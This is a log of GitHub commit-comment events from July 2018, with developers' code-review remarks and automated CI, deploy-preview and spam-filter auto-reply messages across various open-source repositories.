{"id":"8040131765","type":"CommitCommentEvent","actor":{"login":"ahjolinna"},"repo":{"name":"cmdrkotori/mpc-qt"},"payload":{"comment":{"id":29893456,"position":null,"line":null,"path":null,"commit_id":"24866be4535df7a6cac5f07af41d0ead3e29e45e","created_at":"2018-07-30T20:34:46Z","updated_at":"2018-07-30T20:34:46Z","author_association":"CONTRIBUTOR","body":"Never say never, as we have seen with many projects they will change with time.\n\nPS. I suggest checking out \"[KDE HIGs](https://hig.kde.org/)\"  for ideas on how to make your application more coherent looking, I'm not saying that make it look like breeze/kde just take a look at what gives a coherent look & feel "}},"created_at":"2018-07-30T20:34:46Z"}
{"id":"8040132761","type":"CommitCommentEvent","actor":{"login":"sechel"},"repo":{"name":"jantimon/html-webpack-plugin"},"payload":{"comment":{"id":29893457,"position":11,"line":458,"path":"index.js","commit_id":"0348d6b48c7313806bc3350ac6516f1ad1bff645","created_at":"2018-07-30T20:34:57Z","updated_at":"2018-07-30T20:34:57Z","author_association":"NONE","body":"This is a problem as not all js assets end with `.js`, e.g., `karma-webpack` directly uses the chunk name: https://github.com/webpack-contrib/karma-webpack/blob/1ac16eaa7b11ee154a2127d4f03cbfd1a81533f6/src/karma-webpack.js#L65"}},"created_at":"2018-07-30T20:34:57Z"}
{"id":"8040135165","type":"CommitCommentEvent","actor":{"login":"irmen"},"repo":{"name":"carandraug/Pyro4"},"payload":{"comment":{"id":29893466,"position":null,"line":null,"path":null,"commit_id":"63902b87435129b636cf7bf0e9b4ea3623263dec","created_at":"2018-07-30T20:35:26Z","updated_at":"2018-07-30T20:35:26Z","author_association":"NONE","body":"It's probably obvious, but this should not be part of the core module. I assume you put it there for simplicity sake for now.\r\n"}},"created_at":"2018-07-30T20:35:26Z"}
{"id":"8040135297","type":"CommitCommentEvent","actor":{"login":"glaschenko"},"repo":{"name":"Glasch/Personal"},"payload":{"comment":{"id":29893469,"position":16,"line":16,"path":"src/TxtParser.java","commit_id":"f4f68d389a3b18af2ef4559f57552be4f4053a14","created_at":"2018-07-30T20:35:28Z","updated_at":"2018-07-30T20:35:28Z","author_association":"COLLABORATOR","body":"А что если в фамилии будет пробел? Di Maria например. Использовать ; как разделитель, а лучше вообще CSVParser какой-нибудь"}},"created_at":"2018-07-30T20:35:28Z"}
{"id":"8040137960","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29893484,"position":7,"line":6,"path":"src/System.Runtime.WindowsRuntime/src/Configurations.props","commit_id":"30c0919f69e5c5f7971b45fc00cc1ab1d25789aa","created_at":"2018-07-30T20:35:59Z","updated_at":"2018-07-30T20:35:59Z","author_association":"MEMBER","body":"You need RID-less implementations for not-supported assemblies.  The whole point of these is to throw on Unix."}},"created_at":"2018-07-30T20:35:59Z"}
{"id":"8040138911","type":"CommitCommentEvent","actor":{"login":"zaak87"},"repo":{"name":"zaak87/Hello-world"},"payload":{"comment":{"id":29893486,"position":null,"line":null,"path":null,"commit_id":"9e2dfcf4094fc998bc8be58f103d604a3615fa52","created_at":"2018-07-30T20:36:11Z","updated_at":"2018-07-30T20:36:11Z","author_association":"OWNER","body":"cool, it worked"}},"created_at":"2018-07-30T20:36:11Z"}
{"id":"8040140799","type":"CommitCommentEvent","actor":{"login":"andrecarrsd2008"},"repo":{"name":"andrecarrsd2008/Project2"},"payload":{"comment":{"id":29893494,"position":null,"line":null,"path":null,"commit_id":"f0c6bf820c5a98be2fed12ed7876e795a8d4b472","created_at":"2018-07-30T20:36:33Z","updated_at":"2018-07-30T20:36:33Z","author_association":"OWNER","body":"In this application, we wanted to create something that would allow anyone to keep track of their fitness goals. We used HTML, CSS, and Handlebars for the front-end. We also used an API from Starbucks for nutrition purposes. For the database, we used Mongoose and Heroku to upload the app. "}},"created_at":"2018-07-30T20:36:33Z"}
{"id":"8040141451","type":"CommitCommentEvent","actor":{"login":"haberc"},"repo":{"name":"flowin-ibm/website"},"payload":{"comment":{"id":29893496,"position":null,"line":null,"path":null,"commit_id":"76af53c427670d9e5976b591c429aad91a895362","created_at":"2018-07-30T20:36:42Z","updated_at":"2018-07-30T20:36:42Z","author_association":"CONTRIBUTOR","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/b5fbd4e7-2cf5-46fe-b349-6646d1cf8d04?env_id=ibm%3Ayp%3Aeu-gb \"flowin-website-toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/585f8993-389c-496f-ac44-9008022cf5e6?env_id=ibm%3Ayp%3Aeu-gb \"flowin-website-toolchain\") deployed [website](https://github.com/flowin-ibm/website/releases/tag/deploy-ibm-yp-eu-gb-flood.prevention.bb-gmail.com-dev-20180730-203640 \"deploy-ibm-yp-eu-gb-flood.prevention.bb-gmail.com-dev-20180730-203640\") to [dev](https://console.bluemix.net/apps/f4aadab3-79df-4cbc-abc4-f714b8f18659?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:flood.prevention.bb@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-30T20:36:42Z"}
{"id":"8040141620","type":"CommitCommentEvent","actor":{"login":"findesgh"},"repo":{"name":"Karlheinzniebuhr/Scrap.py"},"payload":{"comment":{"id":29893497,"position":null,"line":null,"path":null,"commit_id":"1ba12fdee996fbf7b0cd6964ccad04f147423399","created_at":"2018-07-30T20:36:44Z","updated_at":"2018-07-30T20:36:44Z","author_association":"CONTRIBUTOR","body":"No, con este link no me da unicode tampoco...\r\n\r\nRecomiendo usar unicodecsv aun así porque csv eleva una excepción con resultados unicode..."}},"created_at":"2018-07-30T20:36:44Z"}
{"id":"8040142423","type":"CommitCommentEvent","actor":{"login":"irmen"},"repo":{"name":"carandraug/Pyro4"},"payload":{"comment":{"id":29893503,"position":28,"line":2079,"path":"src/Pyro4/core.py","commit_id":"63902b87435129b636cf7bf0e9b4ea3623263dec","created_at":"2018-07-30T20:36:53Z","updated_at":"2018-07-30T20:36:53Z","author_association":"NONE","body":"can we not simply use __import__ ?"}},"created_at":"2018-07-30T20:36:53Z"}
{"id":"8040152446","type":"CommitCommentEvent","actor":{"login":"irmen"},"repo":{"name":"carandraug/Pyro4"},"payload":{"comment":{"id":29893535,"position":34,"line":2085,"path":"src/Pyro4/core.py","commit_id":"63902b87435129b636cf7bf0e9b4ea3623263dec","created_at":"2018-07-30T20:38:52Z","updated_at":"2018-07-30T20:38:52Z","author_association":"NONE","body":"probably check for attr to be a type (class), it doesn't make sense to register other things with a Pyro daemon"}},"created_at":"2018-07-30T20:38:52Z"}
{"id":"8040152451","type":"CommitCommentEvent","actor":{"login":"EugeniaM"},"repo":{"name":"ViktoriiaHryshko/AngularMP"},"payload":{"comment":{"id":29893536,"position":23,"line":16,"path":"src/app/app.routes.ts","commit_id":"0a8c9da57266feb9a9ade01bb4fb14afbdb01aec","created_at":"2018-07-30T20:38:53Z","updated_at":"2018-07-30T20:38:53Z","author_association":"NONE","body":"Should there be redirection to ''Not found' page?"}},"created_at":"2018-07-30T20:38:53Z"}
{"id":"8040153136","type":"CommitCommentEvent","actor":{"login":"oliviertassinari"},"repo":{"name":"vuetifyjs/vuetifyjs.com"},"payload":{"comment":{"id":29893540,"position":null,"line":null,"path":null,"commit_id":"e0a34f3db973cb7e7083b0785325fdac6071fef6","created_at":"2018-07-30T20:39:01Z","updated_at":"2018-07-30T20:39:01Z","author_association":"NONE","body":"It's smart. We will see with Codefund what they are suggesting us to do to increase the CTR."}},"created_at":"2018-07-30T20:39:01Z"}
{"id":"8040154001","type":"CommitCommentEvent","actor":{"login":"shaoyuancc"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":29893544,"position":11,"line":82,"path":"api/src/main/java/org/openmrs/Patient.java","commit_id":"9f2155ce40bf5f0191ffbfd0e7f159dd32e63f21","created_at":"2018-07-30T20:39:12Z","updated_at":"2018-07-30T20:39:12Z","author_association":"CONTRIBUTOR","body":"would it be: @since 2.2.0 ?"}},"created_at":"2018-07-30T20:39:12Z"}
{"id":"8040170576","type":"CommitCommentEvent","actor":{"login":"dougshell"},"repo":{"name":"dougshell/Simply-Love-SM5"},"payload":{"comment":{"id":29893597,"position":null,"line":null,"path":null,"commit_id":"a6c494a9a2b2c63803e443ad43ab39f5e42467d6","created_at":"2018-07-30T20:42:29Z","updated_at":"2018-07-30T20:42:29Z","author_association":"OWNER","body":"With respect to this update, the description text found here should likely be updated.\r\n\r\n\"TimingWindowAdd=Apply this controversial setting at your own discretion.\\n\\nThe StomperZ and ECFA GameModes ignore this setting.\"\r\n\r\nIf i understand these changes correctly it is implying that EFCA should have been using this setting all along."}},"created_at":"2018-07-30T20:42:29Z"}
{"id":"8040173184","type":"CommitCommentEvent","actor":{"login":"irmen"},"repo":{"name":"carandraug/Pyro4"},"payload":{"comment":{"id":29893605,"position":45,"line":2096,"path":"src/Pyro4/core.py","commit_id":"63902b87435129b636cf7bf0e9b4ea3623263dec","created_at":"2018-07-30T20:43:01Z","updated_at":"2018-07-30T20:43:01Z","author_association":"NONE","body":"It is nice and simple I like that. However I think it also really needs a way to specify logical object names to register it into a name server -- perhaps by simply adding an argument like this :   ``--names ObjClass1=logical.name.one:ObjClass2=logical.name.two``"}},"created_at":"2018-07-30T20:43:01Z"}
{"id":"8040176572","type":"CommitCommentEvent","actor":{"login":"matuskalas"},"repo":{"name":"miRTop/mirGFF3"},"payload":{"comment":{"id":29893614,"position":null,"line":null,"path":null,"commit_id":"1cf05d3224313c517dae8852afb8e5505eb10281","created_at":"2018-07-30T20:43:43Z","updated_at":"2018-07-30T20:43:43Z","author_association":"NONE","body":"@lpantano, EDAM is going to be released tomorrow. Is there anything that needs to be done on either EDAM or mirGFF3 side now right before or after the release?\r\n\r\nThe ID/URI of mirGFF3 in EDAM will be http://edamontology.org/format_3864 (resolvable perhaps tonight).\r\n\r\nPlease let us know (sooner or later) if fixes are needed to :\r\n```\r\n\t<!-- http://edamontology.org/format_3864 -->\r\n\r\n\t<owl:Class rdf:about=\"http://edamontology.org/format_3864\">\r\n\t\t<rdfs:subClassOf rdf:resource=\"http://edamontology.org/format_1975\"/>\r\n\t\t<rdfs:subClassOf rdf:resource=\"http://edamontology.org/format_3864\"/>\r\n\t\t<created_in>1.21</created_in>\r\n\t\t<documentation rdf:resource=\"https://github.com/miRTop/mirGFF3/blob/master/definition.md\"/>\r\n\t\t<example rdf:resource=\"https://github.com/miRTop/mirGFF3/blob/master/example.gff\"/>\r\n\t\t<repository rdf:resource=\"https://github.com/miRTop/mirGFF3\"/>\r\n\t\t<citation rdf:resource=\"https://doi.org/10.7490/f1000research.1115724.1\"/>\r\n\t\t<oboInOwl:hasDefinition>mirGFF3 is a common format for microRNA data resulting from small-RNA RNA-Seq workflows.</oboInOwl:hasDefinition>\r\n\t\t<rdfs:comment>mirGFF3 is a specialisation of GFF3; produced by small-RNA-Seq analysis workflows, usable and convertible with the miRTop API (https://mirtop.readthedocs.io/en/latest/), and consumable by tools for downstream analysis.</rdfs:comment>\r\n\t\t<oboInOwl:inSubset rdf:resource=\"http://purl.obolibrary.org/obo/edam#edam\"/>\r\n\t\t<oboInOwl:inSubset rdf:resource=\"http://purl.obolibrary.org/obo/edam#formats\"/>\r\n\t\t<rdfs:label>mirGFF3</rdfs:label>\r\n\t\t<oboInOwl:hasExactSynonym>miRTop format</oboInOwl:hasExactSynonym>\r\n\t</owl:Class>\r\n```\r\n\r\n(from https://github.com/edamontology/edamontology/commit/fe9e4f039df8fa3a7b39ad4a991b92ff1da5488a)"}},"created_at":"2018-07-30T20:43:43Z"}
{"id":"8040176664","type":"CommitCommentEvent","actor":{"login":"dguzek"},"repo":{"name":"dougshell/Simply-Love-SM5"},"payload":{"comment":{"id":29893615,"position":null,"line":null,"path":null,"commit_id":"a6c494a9a2b2c63803e443ad43ab39f5e42467d6","created_at":"2018-07-30T20:43:44Z","updated_at":"2018-07-30T20:43:44Z","author_association":"NONE","body":"It is still accurate to say that StomperZ and ECFA GameModes ignore this setting."}},"created_at":"2018-07-30T20:43:44Z"}
{"id":"8040178078","type":"CommitCommentEvent","actor":{"login":"skjolber"},"repo":{"name":"skjolber/3d-bin-container-packing"},"payload":{"comment":{"id":29893620,"position":null,"line":null,"path":null,"commit_id":"6765f38d9036f715b7d418ec492520b51c28849f","created_at":"2018-07-30T20:44:00Z","updated_at":"2018-07-30T20:44:00Z","author_association":"OWNER","body":"Hi, the binary search is the same as a for-loop on a list of two. Basically with a list of 3 you'd start with the one in the middle and then go up or down, but for two you might as well go with the first and then the other?"}},"created_at":"2018-07-30T20:44:00Z"}
{"id":"8040179432","type":"CommitCommentEvent","actor":{"login":"NGUYENTUANANH1983"},"repo":{"name":"jamiebuilds/the-super-tiny-compiler"},"payload":{"comment":{"id":29893622,"position":35,"line":853,"path":"the-super-tiny-compiler.js","commit_id":"a4b38d76e3f69c3df98dc3dd55d9fbfce8acdf65","created_at":"2018-07-30T20:44:18Z","updated_at":"2018-07-30T20:44:18Z","author_association":"NONE","body":"853"}},"created_at":"2018-07-30T20:44:18Z"}
{"id":"8040179743","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"AuthMe/ConfigMe"},"payload":{"comment":{"id":29893624,"position":27,"line":48,"path":"src/main/java/ch/jalu/configme/neo/resource/PropertyPathTraverser.java","commit_id":"e80838fed2cc63c6870d6d77ec32088c7baff1eb","created_at":"2018-07-30T20:44:22Z","updated_at":"2018-07-30T20:44:22Z","author_association":"MEMBER","body":"oops, this is not needed"}},"created_at":"2018-07-30T20:44:22Z"}
{"id":"8040181950","type":"CommitCommentEvent","actor":{"login":"Glasch"},"repo":{"name":"Glasch/Personal"},"payload":{"comment":{"id":29893632,"position":1,"line":1,"path":"src/personal.xml","commit_id":"f4f68d389a3b18af2ef4559f57552be4f4053a14","created_at":"2018-07-30T20:44:48Z","updated_at":"2018-07-30T20:44:48Z","author_association":"OWNER","body":"Этот файл - по сути выходные данные, его не нужен коммитить в репу"}},"created_at":"2018-07-30T20:44:48Z"}
{"id":"8040182500","type":"CommitCommentEvent","actor":{"login":"Ernstbert"},"repo":{"name":"jamiebuilds/the-super-tiny-compiler"},"payload":{"comment":{"id":29893634,"position":35,"line":853,"path":"the-super-tiny-compiler.js","commit_id":"a4b38d76e3f69c3df98dc3dd55d9fbfce8acdf65","created_at":"2018-07-30T20:44:55Z","updated_at":"2018-07-30T20:44:55Z","author_association":"NONE","body":"Sehr geehrter Absender!\n\nDie E-Mail Adresse  wird vom Antispamservice >SpamCleaner< gesch�tzt. SpamCleaner hat entdeckt, dass Ihre E-Mail Adresse noch >einmalig< authentifiziert werden muss, damit Ihre E-Mails zugestellt werden k�nnen. \n\nF�r die Authentifizierung stehen Ihnen 2 M�glichkeiten zur Verf�gung:\na) Einfach ein Retourmail zu dieser Mail senden.\nb) Auf nachstehenden Link klicken \nhttp://jubelbox.at/spamcleaner/p2rlie870lh0w5acn9h3\n\nVielen herzlichen Dank f�r Ihre Unterst�tzung beim Kampf gegen Spam. \n\n\n\nNach der Authentifizierung werden auch Ihre bisherigen E-Mails vor der Authentifizierung automatisch zugestellt.   \n\nMit freundlichen Gr��en\nSpamCleaner\n"}},"created_at":"2018-07-30T20:44:55Z"}
{"id":"8040183678","type":"CommitCommentEvent","actor":{"login":"arschles"},"repo":{"name":"manugupt1/athens"},"payload":{"comment":{"id":29893638,"position":null,"line":null,"path":null,"commit_id":"e8f657e5cdeeaa4af1315088b018e57e38151e92","created_at":"2018-07-30T20:45:10Z","updated_at":"2018-07-30T20:45:10Z","author_association":"NONE","body":"@manugupt1 I feel like this is a good stepping stone toward passing the trace down the stack. you, @bketelsen, me and a few others spoke last Friday about updating buffet to accept `context.Context`s, and type-asserting to `buffalo.Context`s internally"}},"created_at":"2018-07-30T20:45:10Z"}
{"id":"8040186876","type":"CommitCommentEvent","actor":{"login":"dguzek"},"repo":{"name":"dougshell/Simply-Love-SM5"},"payload":{"comment":{"id":29893644,"position":null,"line":null,"path":null,"commit_id":"a6c494a9a2b2c63803e443ad43ab39f5e42467d6","created_at":"2018-07-30T20:45:48Z","updated_at":"2018-07-30T20:45:48Z","author_association":"NONE","body":"In this context, \"this setting\" refers to the Simply Love ThemePref, not the StepMania Preference.\r\n\r\nECFA mode ignores the Simply Love ThemePref by hardcoding the StepMania Preference."}},"created_at":"2018-07-30T20:45:48Z"}
{"id":"8040186986","type":"CommitCommentEvent","actor":{"login":"NGUYENTUANANH1983"},"repo":{"name":"jamiebuilds/the-super-tiny-compiler"},"payload":{"comment":{"id":29893645,"position":7,"line":111,"path":"the-super-tiny-compiler.js","commit_id":"a4b38d76e3f69c3df98dc3dd55d9fbfce8acdf65","created_at":"2018-07-30T20:45:50Z","updated_at":"2018-07-30T20:45:50Z","author_association":"NONE","body":"111"}},"created_at":"2018-07-30T20:45:50Z"}
{"id":"8040187655","type":"CommitCommentEvent","actor":{"login":"Ernstbert"},"repo":{"name":"jamiebuilds/the-super-tiny-compiler"},"payload":{"comment":{"id":29893646,"position":16,"line":336,"path":"the-super-tiny-compiler.js","commit_id":"a4b38d76e3f69c3df98dc3dd55d9fbfce8acdf65","created_at":"2018-07-30T20:45:58Z","updated_at":"2018-07-30T20:45:58Z","author_association":"NONE","body":"Sehr geehrter Absender!\n\nDie E-Mail Adresse  wird vom Antispamservice >SpamCleaner< gesch�tzt. SpamCleaner hat entdeckt, dass Ihre E-Mail Adresse noch >einmalig< authentifiziert werden muss, damit Ihre E-Mails zugestellt werden k�nnen. \n\nF�r die Authentifizierung stehen Ihnen 2 M�glichkeiten zur Verf�gung:\na) Einfach ein Retourmail zu dieser Mail senden.\nb) Auf nachstehenden Link klicken \nhttp://jubelbox.at/spamcleaner/peojw5qc72yxro48xcer\n\nVielen herzlichen Dank f�r Ihre Unterst�tzung beim Kampf gegen Spam. \n\n\n\nNach der Authentifizierung werden auch Ihre bisherigen E-Mails vor der Authentifizierung automatisch zugestellt.   \n\nMit freundlichen Gr��en\nSpamCleaner\n"}},"created_at":"2018-07-30T20:45:58Z"}
{"id":"8040190280","type":"CommitCommentEvent","actor":{"login":"Ernstbert"},"repo":{"name":"jamiebuilds/the-super-tiny-compiler"},"payload":{"comment":{"id":29893651,"position":7,"line":111,"path":"the-super-tiny-compiler.js","commit_id":"a4b38d76e3f69c3df98dc3dd55d9fbfce8acdf65","created_at":"2018-07-30T20:46:30Z","updated_at":"2018-07-30T20:46:30Z","author_association":"NONE","body":"Sehr geehrter Absender!\n\nDie E-Mail Adresse  wird vom Antispamservice >SpamCleaner< gesch�tzt. SpamCleaner hat entdeckt, dass Ihre E-Mail Adresse noch >einmalig< authentifiziert werden muss, damit Ihre E-Mails zugestellt werden k�nnen. \n\nF�r die Authentifizierung stehen Ihnen 2 M�glichkeiten zur Verf�gung:\na) Einfach ein Retourmail zu dieser Mail senden.\nb) Auf nachstehenden Link klicken \nhttp://jubelbox.at/spamcleaner/4dnctetoye6f9mvqqxpv\n\nVielen herzlichen Dank f�r Ihre Unterst�tzung beim Kampf gegen Spam. \n\n\n\nNach der Authentifizierung werden auch Ihre bisherigen E-Mails vor der Authentifizierung automatisch zugestellt.   \n\nMit freundlichen Gr��en\nSpamCleaner\n"}},"created_at":"2018-07-30T20:46:30Z"}
{"id":"8040198090","type":"CommitCommentEvent","actor":{"login":"vak2ve"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29893670,"position":null,"line":null,"path":null,"commit_id":"2e0bcd35cd93660a78a821d32bc82428e8208db4","created_at":"2018-07-30T20:48:03Z","updated_at":"2018-07-30T20:48:03Z","author_association":"CONTRIBUTOR","body":"@WaxCylinderRevival Just confirming dates project guidelines--should every frus:attachment, even nested ones, have a dateline? And if there isn't one it should be taken from the parent document head and included in brackets? There are a lot more frus:attachments in these 1860s volumes so I want to make sure I'm clear. Thanks!"}},"created_at":"2018-07-30T20:48:03Z"}
{"id":"8040198555","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/sphinxcontrib-httpdomain-feedstock"},"payload":{"comment":{"id":29893671,"position":null,"line":null,"path":null,"commit_id":"ae3060100c50f9aafa35516881daf3eddf0e967c","created_at":"2018-07-30T20:48:10Z","updated_at":"2018-07-30T20:48:10Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @carlodri was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-30T20:48:10Z"}
{"id":"8040199033","type":"CommitCommentEvent","actor":{"login":"paulirish"},"repo":{"name":"GoogleChrome/lighthouse"},"payload":{"comment":{"id":29893672,"position":4,"line":410,"path":"lighthouse-core/config/config.js","commit_id":"a4475e1902d3b650a2bf2b0b87e6b00bbcd41e13","created_at":"2018-07-30T20:48:15Z","updated_at":"2018-07-30T20:48:15Z","author_association":"MEMBER","body":"> If a locale is requested in flags or settings, use it. A typical CLI run will not have one, however `lookupLocale` will always determine which of our supported locales to use (falling back if necessary)."}},"created_at":"2018-07-30T20:48:15Z"}
{"id":"8040202479","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29893677,"position":null,"line":null,"path":null,"commit_id":"8e82bbb2a49298d029ccd8c85f9f0b17a63edb0f","created_at":"2018-07-30T20:48:58Z","updated_at":"2018-07-30T20:48:58Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1043](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1043).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1043-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-30T20:48:58Z"}
{"id":"8040203823","type":"CommitCommentEvent","actor":{"login":"mar-esther23"},"repo":{"name":"Tonatiuhxotl/planets"},"payload":{"comment":{"id":29893683,"position":null,"line":null,"path":null,"commit_id":"673842ce0de718b0863b194026aa37ce2d4963bf","created_at":"2018-07-30T20:49:13Z","updated_at":"2018-07-30T20:49:13Z","author_association":"COLLABORATOR","body":"me ganaste!"}},"created_at":"2018-07-30T20:49:13Z"}
{"id":"8040205923","type":"CommitCommentEvent","actor":{"login":"shattenjager"},"repo":{"name":"shattenjager/content-jenkins-java-project"},"payload":{"comment":{"id":29893685,"position":null,"line":null,"path":null,"commit_id":"846ae3783c5830c2b6cd8a2c0aa1d5654913edc3","created_at":"2018-07-30T20:49:36Z","updated_at":"2018-07-30T20:49:36Z","author_association":"OWNER","body":"I removed pretty much everything and started with just the first stage mirroring the lesson. Now it works."}},"created_at":"2018-07-30T20:49:36Z"}
{"id":"8040206733","type":"CommitCommentEvent","actor":{"login":"stasgm"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29893688,"position":18,"line":27,"path":"package.json","commit_id":"f9bcda98ca13eadaafe9b59fdd339991539c7d5e","created_at":"2018-07-30T20:49:46Z","updated_at":"2018-07-30T20:49:46Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-30T20:49:46Z"}
{"id":"8040206992","type":"CommitCommentEvent","actor":{"login":"stasgm"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29893689,"position":26,"line":34,"path":"package.json","commit_id":"f9bcda98ca13eadaafe9b59fdd339991539c7d5e","created_at":"2018-07-30T20:49:49Z","updated_at":"2018-07-30T20:49:49Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-30T20:49:49Z"}
{"id":"8040207590","type":"CommitCommentEvent","actor":{"login":"stasgm"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29893690,"position":95,"line":57,"path":"src/App.css","commit_id":"f9bcda98ca13eadaafe9b59fdd339991539c7d5e","created_at":"2018-07-30T20:49:56Z","updated_at":"2018-07-30T20:49:56Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-30T20:49:56Z"}
{"id":"8040209388","type":"CommitCommentEvent","actor":{"login":"dguzek"},"repo":{"name":"dougshell/Simply-Love-SM5"},"payload":{"comment":{"id":29893698,"position":null,"line":null,"path":null,"commit_id":"a6c494a9a2b2c63803e443ad43ab39f5e42467d6","created_at":"2018-07-30T20:50:18Z","updated_at":"2018-07-30T20:50:18Z","author_association":"NONE","body":"As an aside, it makes more sense to post comments/questions on my Simply Love GitHub repository than your fork.  I can more easily/readily point people with the same question in the future to my repo."}},"created_at":"2018-07-30T20:50:18Z"}
{"id":"8040211204","type":"CommitCommentEvent","actor":{"login":"raihanrms"},"repo":{"name":"raihanrms/Struc-Prog-LAB"},"payload":{"comment":{"id":29893702,"position":null,"line":null,"path":null,"commit_id":"4c1c0fe8373bb6dccbe3d833d85b04732dbe954c","created_at":"2018-07-30T20:50:39Z","updated_at":"2018-07-30T20:50:39Z","author_association":"OWNER","body":"Mid"}},"created_at":"2018-07-30T20:50:39Z"}
{"id":"8040215374","type":"CommitCommentEvent","actor":{"login":"dpseidel"},"repo":{"name":"dpseidel/ggplot2"},"payload":{"comment":{"id":29893710,"position":22,"line":120,"path":"R/axis-secondary.R","commit_id":"236661ee72f4f3ce6de64e50c1a1d2df3494d4b4","created_at":"2018-07-30T20:51:28Z","updated_at":"2018-07-30T20:51:28Z","author_association":"OWNER","body":"So this is a partial reversal of PR 2095 because using the transformed values meant that duplicate axis for some transformed axes failed the monotonicity test. "}},"created_at":"2018-07-30T20:51:28Z"}
{"id":"8040215809","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29893711,"position":null,"line":null,"path":null,"commit_id":"bf4326d4d97c3998c3771ff367df43740c184baf","created_at":"2018-07-30T20:51:33Z","updated_at":"2018-07-30T20:51:33Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - i386-Windows-7-VisualStudio-14: OK (2954 of 2954 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T20:51:33Z"}
{"id":"8040220930","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29893720,"position":null,"line":null,"path":null,"commit_id":"32b5b7da6757c2fa0e90b293330e5b55bcd4c7a3","created_at":"2018-07-30T20:52:29Z","updated_at":"2018-07-30T20:52:29Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1045](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1045).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1045-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-30T20:52:29Z"}
{"id":"8040221204","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29893721,"position":null,"line":null,"path":null,"commit_id":"b30ecd21ade5db20e6a05df8db1e408063259725","created_at":"2018-07-30T20:52:32Z","updated_at":"2018-07-30T20:52:32Z","author_association":"COLLABORATOR","body":"<h3>PanelStack docs</h3>\n\nPreview: <strong><a href='https://19217-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19217-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19217-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-30T20:52:32Z"}
{"id":"8040224072","type":"CommitCommentEvent","actor":{"login":"NWpiter"},"repo":{"name":"NWpiter/google-homepage-"},"payload":{"comment":{"id":29893730,"position":3,"line":2,"path":"README.md","commit_id":"8779c08eb4033e87c00a4c8aaa39689cbf6012b9","created_at":"2018-07-30T20:53:07Z","updated_at":"2018-07-30T20:53:07Z","author_association":"OWNER","body":"что я делаю?"}},"created_at":"2018-07-30T20:53:07Z"}
{"id":"8040226121","type":"CommitCommentEvent","actor":{"login":"jamsch"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29893736,"position":null,"line":null,"path":null,"commit_id":"892212bad2daadd373f4be241e4cd9889b0a1005","created_at":"2018-07-30T20:53:31Z","updated_at":"2018-07-30T20:53:31Z","author_association":"NONE","body":"Thanks. I hope this is cherry picked in the next release."}},"created_at":"2018-07-30T20:53:31Z"}
{"id":"8040231443","type":"CommitCommentEvent","actor":{"login":"NWpiter"},"repo":{"name":"NWpiter/google-homepage-"},"payload":{"comment":{"id":29893747,"position":1,"line":1,"path":"README.md","commit_id":"8779c08eb4033e87c00a4c8aaa39689cbf6012b9","created_at":"2018-07-30T20:54:35Z","updated_at":"2018-07-30T20:54:35Z","author_association":"OWNER","body":"сложно то как"}},"created_at":"2018-07-30T20:54:35Z"}
